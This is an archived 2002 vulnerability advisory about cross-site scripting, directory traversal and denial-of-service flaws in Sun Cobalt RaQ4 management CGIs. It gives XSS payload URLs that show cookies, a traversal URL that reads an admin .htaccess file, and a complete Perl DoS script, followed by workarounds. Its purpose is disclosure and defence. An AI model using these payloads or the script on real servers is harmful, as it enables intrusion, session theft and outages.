1st Mar 2002 [SBWID-5156]
COMMAND
Cobalt Raq4 Cross site scripting, directory traversal and DoS
vulnerabilities
SYSTEMS AFFECTED
Version: RAQ 4 Server Management.
PROBLEM
Alex Hernandez found following vulnerabilities, regarding the Sun
Cobalt RaQ, which is a server appliance for Internet Service Providers
(ISPs).
It can host up to 200 individual websites or it can be dedicated to a
single medium or large customer. This versatility opens up tremendous
opportunity for service provider to invest in a single piece of
hardware while migrating business customers up to dedicated servers.
Exist three vulnerabilities:
a) Cross Site Scripting.
b) Traversal vulnerabilities.
c) Denial Of Service.(Exploit Released)
Cobalt\'s service.cgi incorrectly handles the incoming search parses,
incoming HTML tags or JavaScript will be included inside the result
without them being filtered out for dangerous content. A similar
problem occurs with the x.cgi\'s inclusion of malicious code inside the
resulting title search.
The cgi\'s files is an open source. A security vulnerability in the
product allows attackers to insert malicious content into existing web
pages by exploiting the Cross-Site Scripting Vulnerability.
Affected Cgi\'s Files
alert.cgi
service.cgi
EXAMPLES:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<h1>Hello!</h1><script>alert(\'hello\')</script>
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert(\'Microsoft%20hole\')</script>
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert(document.domain)>
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<script>alert(document.cookie)</script>
LOCATION:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.location)%3C/script%3E
COOKIES:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=%3Cscript%3Ealert(document.cookie)%3C/script%3E
TAG IMAGES:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<img%20src=javascript:alert(document.domain)>
WRITE ON DOCUMENT:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=<SCRIPT>document.write(document.domain)</SCRIPT>
------oOo--------
Traversal File configuration.
Exploit:
http://10.0.0.1:81/.cobalt/sysManage/../admin/.htaccess
# Access file for /usr/admserv/html/.cobalt/admin/ (admin )
order allow,deny
allow from all
require user admin
Authname CobaltRaQ
Authtype Basic
Directory by Default on server is: \"/usr/admserv/html/.cobalt/admin\"
u can translate to any directory for capture restricted files or
passwords and profiles the users.
------oOo--------
Denial Of service.
Proof Of concept:
Server crashes after sending a very long URL:
Example:
http://10.0.0.1:81/cgi-bin/.cobalt/alert/service.cgi?service=/AAAAAAAAA...(Ax100000)...AAA
Crash system and the admin need restart the service!.
------oOo-------------
Exploit Code DoS Cobalt4_DoS.pl
------oOo-------------
#!/usr/bin/perl
#
# Simple script to send a long \'A^s\' command to the server,
# resulting in the server crashing.
#
# Cobalt RAQ DoS v4 proof-of-concept exploit.
# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.
#
#
# Usage: perl -x Cobalt4_DoS.pl -s <server>
#
# Example:
#
# perl -x Cobalt4_DoS.pl -s 10.0.0.1
#
# Crash was successful !
#
use Getopt::Std;
use IO::Socket;
print(\"\\nCobalt RAQ DoS v4.0 DoS exploit (c)2002.\\n\");
print(\"Alex Hernandez al3xhernandez\\@ureach.com\\n\\n\");
getopts(\'s:\', \\%args);
if(!defined($args{s})){&usage;}
($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto);
$def = \"A\";
$num = \"100000\";
$data .= $def x $num;
$serv = $args{s};
$port = 81;#maybe u define the port for diference of versions
$buf = \"GET /cgi-bin/.cobalt/alert/service.cgi?service=$data
/HTTP/1.0\\r\\n\\r\\n\";
$in_addr = (gethostbyname($serv))[4] || die(\"Error: $!\\n\");
$paddr = sockaddr_in($port, $in_addr) || die (\"Error: $!\\n\");
$proto = getprotobyname(\'tcp\') || die(\"Error: $!\\n\");
socket(S, PF_INET, SOCK_STREAM, $proto) || die(\"Error: $!\");
connect(S, $paddr) ||die (\"Error: $!\");
select(S); $| = 1; select(STDOUT);
print S \"$buf\";
print(\"\\nCrash was successful !\\n\\n\");
sub usage {die(\"\\n\\nUsage: perl -x $0 -s <server>\\n\\n\");}
SOLUTION
Workaround:
1) Delete service.cgi from the system, or disable its possible
execution.
2) Delete alert.cgi from the system, or disable its possible execution
Update (04 March 2002)
======
Other workaround by Peter N. Go [http://CGI-City.net/]
------------------------
1. CROSS SITE SCRIPTING.
------------------------
Possible workaround: Instead of deleting or disabling the
\"service.cgi\" file, edit the file and add a line that strips out HTML
tags. Something like this:
$service =~ s/<([^>])*>//g;
This may be added after this line in the code:
my $service = $q->param(\'service\');
-----------------------------
2. TRAVERSAL VULNERABILITIES.
-----------------------------
Possible workaround: Create an .htaccess file in the /usr/admserv/html
directory with the following entry:
<Files .htaccess>
Order allow,deny
Deny from all
</Files>
This should prevent all .htaccess files from being viewed by any web
browser.
---------------------
3. DENIAL OF SERVICE.
---------------------
Possible workaround: Again, in the \"service.cgi\" file, add a simple
check for the length of the string passed. In this example, if the
string is > 500 chars, the program exits.
if (length($service) > 500) { exit; }
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
